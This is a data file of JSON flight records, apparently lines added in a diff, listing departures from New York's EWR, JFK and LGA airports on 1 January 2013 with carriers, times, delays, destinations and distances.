+{"year":2013,"month":1,"day":1,"dep_time":1513,"sched_dep_time":1505,"dep_delay":8,"arr_time":1714,"sched_arr_time":1703,"arr_delay":11,"carrier":"EV","flight":4223,"tailnum":"N13914","origin":"EWR","dest":"CLT","air_time":102,"distance":529,"hour":15,"minute":5,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1513,"sched_dep_time":1515,"dep_delay":-2,"arr_time":1705,"sched_arr_time":1700,"arr_delay":5,"carrier":"MQ","flight":4333,"tailnum":"N635MQ","origin":"JFK","dest":"PIT","air_time":79,"distance":340,"hour":15,"minute":15,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1515,"sched_dep_time":1437,"dep_delay":38,"arr_time":1834,"sched_arr_time":1742,"arr_delay":52,"carrier":"B6","flight":347,"tailnum":"N178JB","origin":"JFK","dest":"SRQ","air_time":171,"distance":1041,"hour":14,"minute":37,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1518,"sched_dep_time":1516,"dep_delay":2,"arr_time":1837,"sched_arr_time":1832,"arr_delay":5,"carrier":"UA","flight":1699,"tailnum":"N53442","origin":"EWR","dest":"SFO","air_time":348,"distance":2565,"hour":15,"minute":16,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1520,"sched_dep_time":1430,"dep_delay":50,"arr_time":1835,"sched_arr_time":1735,"arr_delay":60,"carrier":"AA","flight":883,"tailnum":"N589AA","origin":"EWR","dest":"DFW","air_time":236,"distance":1372,"hour":14,"minute":30,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1520,"sched_dep_time":1525,"dep_delay":-5,"arr_time":1643,"sched_arr_time":1655,"arr_delay":-12,"carrier":"MQ","flight":3823,"tailnum":"N509MQ","origin":"JFK","dest":"DCA","air_time":57,"distance":213,"hour":15,"minute":25,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1520,"sched_dep_time":1520,"dep_delay":0,"arr_time":1817,"sched_arr_time":1816,"arr_delay":1,"carrier":"UA","flight":1593,"tailnum":"N13750","origin":"EWR","dest":"MCO","air_time":152,"distance":937,"hour":15,"minute":20,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1521,"sched_dep_time":1515,"dep_delay":6,"arr_time":1830,"sched_arr_time":1823,"arr_delay":7,"carrier":"DL","flight":507,"tailnum":"N378NW","origin":"LGA","dest":"MCO","air_time":145,"distance":950,"hour":15,"minute":15,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1522,"sched_dep_time":1530,"dep_delay":-8,"arr_time":1731,"sched_arr_time":1725,"arr_delay":6,"carrier":"MQ","flight":4146,"tailnum":"N902MQ","origin":"JFK","dest":"CMH","air_time":98,"distance":483,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1522,"sched_dep_time":1530,"dep_delay":-8,"arr_time":1858,"sched_arr_time":1855,"arr_delay":3,"carrier":"UA","flight":530,"tailnum":"N512UA","origin":"JFK","dest":"LAX","air_time":356,"distance":2475,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1523,"sched_dep_time":1516,"dep_delay":7,"arr_time":1831,"sched_arr_time":1828,"arr_delay":3,"carrier":"UA","flight":1600,"tailnum":"N18112","origin":"EWR","dest":"LAX","air_time":337,"distance":2454,"hour":15,"minute":16,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1524,"sched_dep_time":1457,"dep_delay":27,"arr_time":1828,"sched_arr_time":1801,"arr_delay":27,"carrier":"B6","flight":141,"tailnum":"N504JB","origin":"JFK","dest":"PBI","air_time":156,"distance":1028,"hour":14,"minute":57,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1525,"sched_dep_time":1340,"dep_delay":105,"arr_time":1831,"sched_arr_time":1626,"arr_delay":125,"carrier":"B6","flight":525,"tailnum":"N231JB","origin":"EWR","dest":"MCO","air_time":152,"distance":937,"hour":13,"minute":40,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1525,"sched_dep_time":1530,"dep_delay":-5,"arr_time":1934,"sched_arr_time":1805,"carrier":"MQ","flight":4525,"tailnum":"N719MQ","origin":"LGA","dest":"XNA","distance":1147,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1526,"sched_dep_time":1530,"dep_delay":-4,"arr_time":1714,"sched_arr_time":1650,"arr_delay":24,"carrier":"WN","flight":4105,"tailnum":"N280WN","origin":"EWR","dest":"MDW","air_time":141,"distance":711,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1527,"sched_dep_time":1530,"dep_delay":-3,"arr_time":1841,"sched_arr_time":1855,"arr_delay":-14,"carrier":"AA","flight":1039,"tailnum":"N3HYAA","origin":"JFK","dest":"FLL","air_time":163,"distance":1069,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1527,"sched_dep_time":1455,"dep_delay":32,"arr_time":1655,"sched_arr_time":1628,"arr_delay":27,"carrier":"B6","flight":8,"tailnum":"N607JB","origin":"JFK","dest":"BUF","air_time":66,"distance":301,"hour":14,"minute":55,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1527,"sched_dep_time":1533,"dep_delay":-6,"arr_time":1836,"sched_arr_time":1857,"arr_delay":-21,"carrier":"B6","flight":137,"tailnum":"N794JB","origin":"JFK","dest":"RSW","air_time":168,"distance":1074,"hour":15,"minute":33,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1527,"sched_dep_time":1515,"dep_delay":12,"arr_time":1854,"sched_arr_time":1810,"arr_delay":44,"carrier":"UA","flight":1695,"tailnum":"N69059","origin":"EWR","dest":"IAH","air_time":210,"distance":1400,"hour":15,"minute":15,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1528,"sched_dep_time":1459,"dep_delay":29,"arr_time":2002,"sched_arr_time":1647,"carrier":"EV","flight":3806,"tailnum":"N17108","origin":"EWR","dest":"STL","distance":872,"hour":14,"minute":59,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1528,"sched_dep_time":1530,"dep_delay":-2,"arr_time":1731,"sched_arr_time":1725,"arr_delay":6,"carrier":"AA","flight":2223,"tailnum":"N573AA","origin":"LGA","dest":"STL","air_time":160,"distance":888,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1529,"sched_dep_time":1457,"dep_delay":32,"arr_time":1720,"sched_arr_time":1634,"arr_delay":46,"carrier":"UA","flight":459,"tailnum":"N497UA","origin":"EWR","dest":"ORD","air_time":138,"distance":719,"hour":14,"minute":57,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1529,"sched_dep_time":1530,"dep_delay":-1,"arr_time":1733,"sched_arr_time":1737,"arr_delay":-4,"carrier":"US","flight":1665,"tailnum":"N738US","origin":"LGA","dest":"CLT","air_time":103,"distance":544,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1530,"sched_dep_time":1530,"dep_delay":0,"arr_time":1650,"sched_arr_time":1655,"arr_delay":-5,"carrier":"9E","flight":3369,"tailnum":"N913XJ","origin":"JFK","dest":"BWI","air_time":40,"distance":184,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1531,"sched_dep_time":1453,"dep_delay":38,"arr_time":1637,"sched_arr_time":1603,"arr_delay":34,"carrier":"EV","flight":4372,"tailnum":"N13975","origin":"EWR","dest":"DCA","air_time":45,"distance":199,"hour":14,"minute":53,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1531,"sched_dep_time":1459,"dep_delay":32,"arr_time":1745,"sched_arr_time":1658,"arr_delay":47,"carrier":"EV","flight":4572,"tailnum":"N15912","origin":"EWR","dest":"GSP","air_time":106,"distance":594,"hour":14,"minute":59,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1531,"sched_dep_time":1520,"dep_delay":11,"arr_time":1809,"sched_arr_time":1750,"arr_delay":19,"carrier":"UA","flight":365,"tailnum":"N514UA","origin":"EWR","dest":"DEN","air_time":247,"distance":1605,"hour":15,"minute":20,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1534,"sched_dep_time":1530,"dep_delay":4,"arr_time":1755,"sched_arr_time":1735,"arr_delay":20,"carrier":"EV","flight":4093,"tailnum":"N17115","origin":"EWR","dest":"GRR","air_time":120,"distance":605,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1536,"sched_dep_time":1520,"dep_delay":16,"arr_time":1709,"sched_arr_time":1650,"arr_delay":19,"carrier":"WN","flight":2081,"tailnum":"N226WN","origin":"LGA","dest":"MKE","air_time":133,"distance":738,"hour":15,"minute":20,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1538,"sched_dep_time":1540,"dep_delay":-2,"arr_time":1827,"sched_arr_time":1851,"arr_delay":-24,"carrier":"DL","flight":4,"tailnum":"N372DA","origin":"JFK","dest":"MCO","air_time":133,"distance":944,"hour":15,"minute":40,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1539,"sched_dep_time":1530,"dep_delay":9,"arr_time":1904,"sched_arr_time":1910,"arr_delay":-6,"carrier":"AA","flight":85,"tailnum":"N342AA","origin":"JFK","dest":"SFO","air_time":360,"distance":2586,"hour":15,"minute":30,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1539,"sched_dep_time":1545,"dep_delay":-6,"arr_time":1853,"sched_arr_time":1910,"arr_delay":-17,"carrier":"AA","flight":133,"tailnum":"N319AA","origin":"JFK","dest":"LAX","air_time":351,"distance":2475,"hour":15,"minute":45,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1539,"sched_dep_time":1537,"dep_delay":2,"arr_time":1854,"sched_arr_time":1819,"arr_delay":35,"carrier":"UA","flight":1222,"tailnum":"N14250","origin":"EWR","dest":"LAS","air_time":342,"distance":2227,"hour":15,"minute":37,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1540,"sched_dep_time":1338,"dep_delay":122,"arr_time":2020,"sched_arr_time":1825,"arr_delay":115,"carrier":"B6","flight":705,"tailnum":"N570JB","origin":"JFK","dest":"SJU","air_time":193,"distance":1598,"hour":13,"minute":38,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1542,"sched_dep_time":1545,"dep_delay":-3,"arr_time":1852,"sched_arr_time":1913,"arr_delay":-21,"carrier":"DL","flight":1283,"tailnum":"N3750D","origin":"JFK","dest":"SAN","air_time":342,"distance":2446,"hour":15,"minute":45,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1543,"sched_dep_time":1550,"dep_delay":-7,"arr_time":1933,"sched_arr_time":1925,"arr_delay":8,"carrier":"DL","flight":1773,"tailnum":"N688DL","origin":"JFK","dest":"SLC","air_time":320,"distance":1990,"hour":15,"minute":50,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1543,"sched_dep_time":1543,"dep_delay":0,"arr_time":1731,"sched_arr_time":1733,"arr_delay":-2,"carrier":"UA","flight":636,"tailnum":"N413UA","origin":"LGA","dest":"CLE","air_time":88,"distance":419,"hour":15,"minute":43,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1546,"sched_dep_time":1540,"dep_delay":6,"arr_time":1753,"sched_arr_time":1748,"arr_delay":5,"carrier":"9E","flight":3338,"tailnum":"N904XJ","origin":"JFK","dest":"ORD","air_time":146,"distance":740,"hour":15,"minute":40,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1547,"sched_dep_time":1545,"dep_delay":2,"arr_time":1823,"sched_arr_time":1815,"arr_delay":8,"carrier":"DL","flight":1942,"tailnum":"N994DL","origin":"EWR","dest":"ATL","air_time":129,"distance":746,"hour":15,"minute":45,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1548,"sched_dep_time":1420,"dep_delay":88,"arr_time":1751,"sched_arr_time":1620,"arr_delay":91,"carrier":"MQ","flight":4588,"tailnum":"N6EAMQ","origin":"LGA","dest":"MSP","air_time":167,"distance":1020,"hour":14,"minute":20,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1549,"sched_dep_time":1445,"dep_delay":64,"arr_time":1912,"sched_arr_time":1656,"arr_delay":136,"carrier":"EV","flight":4181,"tailnum":"N21197","origin":"EWR","dest":"MCI","air_time":234,"distance":1092,"hour":14,"minute":45,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1549,"sched_dep_time":1548,"dep_delay":1,"arr_time":1851,"sched_arr_time":1859,"arr_delay":-8,"carrier":"UA","flight":80,"tailnum":"N54241","origin":"EWR","dest":"MIA","air_time":156,"distance":1085,"hour":15,"minute":48,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1550,"sched_dep_time":1550,"dep_delay":0,"arr_time":1844,"sched_arr_time":1831,"arr_delay":13,"carrier":"9E","flight":3372,"tailnum":"N934XJ","origin":"JFK","dest":"IND","air_time":139,"distance":665,"hour":15,"minute":50,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1552,"sched_dep_time":1600,"dep_delay":-8,"arr_time":1732,"sched_arr_time":1720,"arr_delay":12,"carrier":"EV","flight":5709,"tailnum":"N825AS","origin":"LGA","dest":"IAD","air_time":55,"distance":229,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1552,"sched_dep_time":1600,"dep_delay":-8,"arr_time":1826,"sched_arr_time":1820,"arr_delay":6,"carrier":"FL","flight":620,"tailnum":"N997AT","origin":"LGA","dest":"ATL","air_time":132,"distance":762,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1552,"sched_dep_time":1600,"dep_delay":-8,"arr_time":1749,"sched_arr_time":1757,"arr_delay":-8,"carrier":"9E","flight":3459,"tailnum":"N910XJ","origin":"JFK","dest":"BNA","air_time":150,"distance":765,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1552,"sched_dep_time":1600,"dep_delay":-8,"arr_time":1933,"sched_arr_time":1915,"arr_delay":18,"carrier":"AA","flight":565,"tailnum":"N3CGAA","origin":"JFK","dest":"DFW","air_time":254,"distance":1391,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1554,"sched_dep_time":1600,"dep_delay":-6,"arr_time":1701,"sched_arr_time":1734,"arr_delay":-33,"carrier":"9E","flight":3331,"tailnum":"N931XJ","origin":"JFK","dest":"BOS","air_time":41,"distance":187,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1554,"sched_dep_time":1559,"dep_delay":-5,"arr_time":1857,"sched_arr_time":1841,"arr_delay":16,"carrier":"DL","flight":847,"tailnum":"N918DE","origin":"LGA","dest":"ATL","air_time":131,"distance":762,"hour":15,"minute":59,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1554,"sched_dep_time":1600,"dep_delay":-6,"arr_time":1830,"sched_arr_time":1820,"arr_delay":10,"carrier":"MQ","flight":3985,"tailnum":"N606MQ","origin":"JFK","dest":"CVG","air_time":118,"distance":589,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1556,"sched_dep_time":1600,"dep_delay":-4,"arr_time":1737,"sched_arr_time":1739,"arr_delay":-2,"carrier":"EV","flight":5163,"tailnum":"N761ND","origin":"LGA","dest":"PIT","air_time":69,"distance":335,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1557,"sched_dep_time":1600,"dep_delay":-3,"arr_time":1910,"sched_arr_time":1939,"arr_delay":-29,"carrier":"DL","flight":1508,"tailnum":"N955DL","origin":"JFK","dest":"RSW","air_time":171,"distance":1074,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1557,"sched_dep_time":1600,"dep_delay":-3,"arr_time":1746,"sched_arr_time":1742,"arr_delay":4,"carrier":"UA","flight":687,"tailnum":"N487UA","origin":"LGA","dest":"ORD","air_time":143,"distance":733,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1558,"sched_dep_time":1534,"dep_delay":24,"arr_time":1808,"sched_arr_time":1703,"arr_delay":65,"carrier":"EV","flight":4502,"tailnum":"N16546","origin":"EWR","dest":"BNA","air_time":168,"distance":748,"hour":15,"minute":34,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1558,"sched_dep_time":1359,"dep_delay":119,"arr_time":1718,"sched_arr_time":1515,"arr_delay":123,"carrier":"EV","flight":5712,"tailnum":"N826AS","origin":"JFK","dest":"IAD","air_time":53,"distance":228,"hour":13,"minute":59,"time_hour":"2013-01-01 13:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1558,"sched_dep_time":1600,"dep_delay":-2,"arr_time":1910,"sched_arr_time":1903,"arr_delay":7,"carrier":"B6","flight":509,"tailnum":"N708JB","origin":"EWR","dest":"FLL","air_time":166,"distance":1065,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1559,"sched_dep_time":1605,"dep_delay":-6,"arr_time":1844,"sched_arr_time":1912,"arr_delay":-28,"carrier":"DL","flight":91,"tailnum":"N374DA","origin":"JFK","dest":"LAS","air_time":309,"distance":2248,"hour":16,"minute":5,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1600,"sched_dep_time":1610,"dep_delay":-10,"arr_time":1712,"sched_arr_time":1729,"arr_delay":-17,"carrier":"9E","flight":4088,"tailnum":"N8968E","origin":"JFK","dest":"PHL","air_time":35,"distance":94,"hour":16,"minute":10,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1601,"sched_dep_time":1601,"dep_delay":0,"arr_time":1750,"sched_arr_time":1735,"arr_delay":15,"carrier":"UA","flight":702,"tailnum":"N484UA","origin":"EWR","dest":"ORD","air_time":141,"distance":719,"hour":16,"minute":1,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1602,"sched_dep_time":1605,"dep_delay":-3,"arr_time":1834,"sched_arr_time":1838,"arr_delay":-4,"carrier":"DL","flight":1861,"tailnum":"N301NB","origin":"LGA","dest":"MCI","air_time":189,"distance":1107,"hour":16,"minute":5,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1603,"sched_dep_time":1547,"dep_delay":16,"arr_time":1720,"sched_arr_time":1708,"arr_delay":12,"carrier":"EV","flight":3272,"tailnum":"N14168","origin":"EWR","dest":"BUF","air_time":58,"distance":282,"hour":15,"minute":47,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1603,"sched_dep_time":1550,"dep_delay":13,"arr_time":1751,"sched_arr_time":1739,"arr_delay":12,"carrier":"B6","flight":917,"tailnum":"N316JB","origin":"JFK","dest":"ORD","air_time":150,"distance":740,"hour":15,"minute":50,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1603,"sched_dep_time":1600,"dep_delay":3,"arr_time":1839,"sched_arr_time":1830,"arr_delay":9,"carrier":"WN","flight":591,"tailnum":"N965WN","origin":"EWR","dest":"DEN","air_time":254,"distance":1605,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1603,"sched_dep_time":1605,"dep_delay":-2,"arr_time":1818,"sched_arr_time":1750,"arr_delay":28,"carrier":"MQ","flight":4415,"tailnum":"N730MQ","origin":"LGA","dest":"RDU","air_time":79,"distance":431,"hour":16,"minute":5,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1603,"sched_dep_time":1600,"dep_delay":3,"arr_time":1912,"sched_arr_time":1906,"arr_delay":6,"carrier":"UA","flight":367,"tailnum":"N820UA","origin":"EWR","dest":"FLL","air_time":162,"distance":1065,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1604,"sched_dep_time":1510,"dep_delay":54,"arr_time":1817,"sched_arr_time":1710,"arr_delay":67,"carrier":"MQ","flight":4579,"tailnum":"N0EGMQ","origin":"LGA","dest":"CLT","air_time":106,"distance":544,"hour":15,"minute":10,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1605,"sched_dep_time":1610,"dep_delay":-5,"arr_time":1804,"sched_arr_time":1800,"arr_delay":4,"carrier":"AA","flight":341,"tailnum":"N569AA","origin":"LGA","dest":"ORD","air_time":146,"distance":733,"hour":16,"minute":10,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1607,"sched_dep_time":1555,"dep_delay":12,"arr_time":1735,"sched_arr_time":1715,"arr_delay":20,"carrier":"B6","flight":12,"tailnum":"N184JB","origin":"JFK","dest":"SYR","air_time":58,"distance":209,"hour":15,"minute":55,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1607,"sched_dep_time":1443,"dep_delay":84,"arr_time":1711,"sched_arr_time":1553,"arr_delay":78,"carrier":"UA","flight":465,"tailnum":"N435UA","origin":"EWR","dest":"BOS","air_time":35,"distance":200,"hour":14,"minute":43,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1608,"sched_dep_time":1535,"dep_delay":33,"arr_time":2002,"sched_arr_time":1850,"arr_delay":72,"carrier":"AA","flight":763,"tailnum":"N3GKAA","origin":"LGA","dest":"DFW","air_time":249,"distance":1389,"hour":15,"minute":35,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1608,"sched_dep_time":1600,"dep_delay":8,"arr_time":1953,"sched_arr_time":1925,"arr_delay":28,"carrier":"AA","flight":1467,"tailnum":"N3DYAA","origin":"LGA","dest":"MIA","air_time":171,"distance":1096,"hour":16,"minute":0,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1608,"sched_dep_time":1609,"dep_delay":-1,"arr_time":1847,"sched_arr_time":1910,"arr_delay":-23,"carrier":"B6","flight":157,"tailnum":"N712JB","origin":"JFK","dest":"MCO","air_time":137,"distance":944,"hour":16,"minute":9,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1610,"sched_dep_time":1615,"dep_delay":-5,"arr_time":1913,"sched_arr_time":1948,"arr_delay":-35,"carrier":"DL","flight":1411,"tailnum":"N947DL","origin":"JFK","dest":"FLL","air_time":155,"distance":1069,"hour":16,"minute":15,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1610,"sched_dep_time":1615,"dep_delay":-5,"arr_time":1827,"sched_arr_time":1830,"arr_delay":-3,"carrier":"DL","flight":1619,"tailnum":"N360NB","origin":"LGA","dest":"MSP","air_time":168,"distance":1020,"hour":16,"minute":15,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1610,"sched_dep_time":1555,"dep_delay":15,"arr_time":1852,"sched_arr_time":1834,"arr_delay":18,"carrier":"DL","flight":1939,"tailnum":"N362NW","origin":"LGA","dest":"DEN","air_time":235,"distance":1620,"hour":15,"minute":55,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1611,"sched_dep_time":1601,"dep_delay":10,"arr_time":2010,"sched_arr_time":1941,"arr_delay":29,"carrier":"UA","flight":1635,"tailnum":"N76504","origin":"EWR","dest":"PHX","air_time":328,"distance":2133,"hour":16,"minute":1,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1615,"sched_dep_time":1602,"dep_delay":13,"arr_time":1748,"sched_arr_time":1728,"arr_delay":20,"carrier":"EV","flight":4406,"tailnum":"N36915","origin":"EWR","dest":"PIT","air_time":73,"distance":319,"hour":16,"minute":2,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1619,"sched_dep_time":1625,"dep_delay":-6,"arr_time":1912,"sched_arr_time":1855,"arr_delay":17,"carrier":"MQ","flight":4661,"tailnum":"N537MQ","origin":"LGA","dest":"ATL","air_time":136,"distance":762,"hour":16,"minute":25,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1620,"sched_dep_time":1620,"dep_delay":0,"arr_time":1945,"sched_arr_time":1922,"arr_delay":23,"carrier":"UA","flight":1178,"tailnum":"N18119","origin":"EWR","dest":"IAH","air_time":242,"distance":1400,"hour":16,"minute":20,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1621,"sched_dep_time":1548,"dep_delay":33,"arr_time":1904,"sched_arr_time":1830,"arr_delay":34,"carrier":"DL","flight":95,"tailnum":"N704X","origin":"JFK","dest":"ATL","air_time":130,"distance":760,"hour":15,"minute":48,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1623,"sched_dep_time":1620,"dep_delay":3,"arr_time":2002,"sched_arr_time":1959,"arr_delay":3,"carrier":"US","flight":35,"tailnum":"N550UW","origin":"JFK","dest":"PHX","air_time":317,"distance":2153,"hour":16,"minute":20,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1625,"sched_dep_time":1550,"dep_delay":35,"arr_time":2054,"sched_arr_time":2050,"arr_delay":4,"carrier":"AA","flight":1635,"tailnum":"N630AA","origin":"JFK","dest":"SJU","air_time":188,"distance":1598,"hour":15,"minute":50,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1626,"sched_dep_time":1630,"dep_delay":-4,"arr_time":2007,"sched_arr_time":1952,"arr_delay":15,"carrier":"B6","flight":675,"tailnum":"N804JB","origin":"JFK","dest":"LAX","air_time":370,"distance":2475,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1626,"sched_dep_time":1630,"dep_delay":-4,"arr_time":1855,"sched_arr_time":1853,"arr_delay":2,"carrier":"DL","flight":702,"tailnum":"N361NW","origin":"JFK","dest":"DTW","air_time":108,"distance":509,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1627,"sched_dep_time":1459,"dep_delay":88,"arr_time":1925,"sched_arr_time":1805,"arr_delay":80,"carrier":"B6","flight":63,"tailnum":"N599JB","origin":"JFK","dest":"TPA","air_time":159,"distance":1005,"hour":14,"minute":59,"time_hour":"2013-01-01 14:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1627,"sched_dep_time":1630,"dep_delay":-3,"arr_time":1940,"sched_arr_time":2020,"arr_delay":-40,"carrier":"VX","flight":27,"tailnum":"N847VA","origin":"JFK","dest":"SFO","air_time":354,"distance":2586,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1628,"sched_dep_time":1524,"dep_delay":64,"arr_time":1740,"sched_arr_time":1641,"arr_delay":59,"carrier":"EV","flight":4133,"tailnum":"N14959","origin":"EWR","dest":"IAD","air_time":53,"distance":212,"hour":15,"minute":24,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1628,"sched_dep_time":1630,"dep_delay":-2,"arr_time":1907,"sched_arr_time":1923,"arr_delay":-16,"carrier":"DL","flight":920,"tailnum":"N331NW","origin":"JFK","dest":"DEN","air_time":248,"distance":1626,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1630,"sched_dep_time":1548,"dep_delay":42,"arr_time":1902,"sched_arr_time":1755,"arr_delay":67,"carrier":"EV","flight":4352,"tailnum":"N22909","origin":"EWR","dest":"CVG","air_time":121,"distance":569,"hour":15,"minute":48,"time_hour":"2013-01-01 15:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1630,"sched_dep_time":1636,"dep_delay":-6,"arr_time":1913,"sched_arr_time":1943,"arr_delay":-30,"carrier":"B6","flight":143,"tailnum":"N534JB","origin":"JFK","dest":"PBI","air_time":147,"distance":1028,"hour":16,"minute":36,"time_hour":"2013-01-01 16:00:00"} 